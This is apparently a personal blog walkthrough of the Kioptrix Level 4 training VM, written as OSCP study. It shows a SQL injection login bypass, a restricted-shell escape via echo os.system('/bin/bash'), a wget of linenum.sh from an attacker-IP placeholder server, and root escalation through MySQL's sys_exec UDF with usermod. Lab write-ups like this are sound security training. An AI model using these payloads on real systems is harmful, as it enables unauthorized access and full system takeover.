Kioptrix: Level 4 Walkthrough

This is the fourth post of a series of posts I’m creating to study for OSCP. You can find the previous post by clicking here.

URL: https://www.vulnhub.com/entry/kioptrix-level-13-4,25/

Release date: 8 Feb 2012

Author: Kioptrix

Provided description: Keeping in the spirit of things, this challenge is a bit different than the others but remains in the realm of the easy. Repeating myself I know, but things must always be made clear: These VMs are for the beginner. It’s a place to start.

Vulnerabilities Found:

SQL Injection;

Command Injection;

Privilege Escalation;

With that being said, let’s get started.

#Scanning and Enumeration

Nmap

Starting the scanning and enumeration process, our good old nmap:

As you can see, we have an SMB server here.

Enum4Linux

I’m going to scan this SMB server using Enum4Linux:

In the bottom of the scanning output, we see the message above, stating that the server has 3 users, loneferret, john and robert. This is interesting and can help us later on.

Gobuster

Using directory enumeration, we didn’t find any valuable information, unless for the john’s and robert’s directories, which confirms that we have at least 2 possible targets:

#Exploiting

Going to the webpage of that server, we are greeted with a login page:

If you recall from my previous posts, I’ve already done some sort of sql injection, so it comes to my mind, what if we try to enter a single quote in both username and password fields and try to authenticate?

Yes, it’s vulnerable, what if we now try to use a username that we got before from the SMB and use some SQL payloads? I tried this one and it worked well:

Username: John

Password: ‘&’

Looks good. We now have a username and password. Let’s try with the others:

Another one. I tried with loneferret and root users and it didn’t come up any valuable information, but I believe these 2 are more than enough.

Since we have a username and password and ssh enabled, we can try to log in to it:

We have a shell on the machine, meaning the password was correct, but the problem is: We are using a shell called kshell. It was configured to be a restricted shell and now we have available only the commands that is showing on the picture above:

cd, clear, echo, exit, help, ll, lpath, ls

It also kick you out of the machine if you make any mistake with the command line, e.g. printing the shell variables. Searching on the internet on how to spawn a shell using the commands available above, I found this cheatsheet which contains the echo command and how to spawn a shell:

echo os.system(‘/bin/bash’)

We are finally out of the jail! Let’s go to the next step, which is to escalate our privileges.

#Escalating Privileges

As soon as we get a low level shell, we start exploring the system to find any breach that can help us to escalate the privileges. To save our time, let’s run our linenum.sh script and see what we can get. To transfer it to your machine, don’t forget the process to set up the python simple http server and download the file using wget:

#Attacker Machine:

python3 -m “http.server”

Victim Machine:

cd /tmp; wget http://<attackerIP>:8000/linenum.sh ; chmod +x linenum.sh

After running our script, and looking for some juicy information, we found the following:

If we try to connect to the instance with root:

mysql -u root -p

Ok, we got root on MySQL, how can we take this path to get root on the machine? First of all, I’m going to check if the mysql process is running as root:

ps -aux | grep mysql

It really is. Is there a way for MySQL to run OS commands that we can use to escalate our privileges?

We can use what is called User Defined Functions. You can read more about this here.

To list the installed UDFs, you can run the following SQL query:

select * from mysql.func;

The one we are looking for is this one:

We can now issue a SELECT statement using this UDF and run commands in the OS. Let’s try to run a simple id command:

select sys_exec(“id”);

If you don’t get any error, this means that it is working fine, otherwise, you’ll get something like this:

With such power on hands, I’m hoping I can add John’s user to the admins group, want to try?

select sys_exec(“usermod -aG admin john”);

Done. Returning to our shell, we can test if the command really worked. Since the user is now part of the admins group, we can issue the following command:

sudo su

There it is! We are now root!

Phew! This one was not that easy, I went through reading a lot of documentation about MySQL to find something that could be exploitable, and if you read it until the end, congratulations, you made it as well! If you have any questions, please leave me a comment, I will be happy to help you.

I see you in the next post!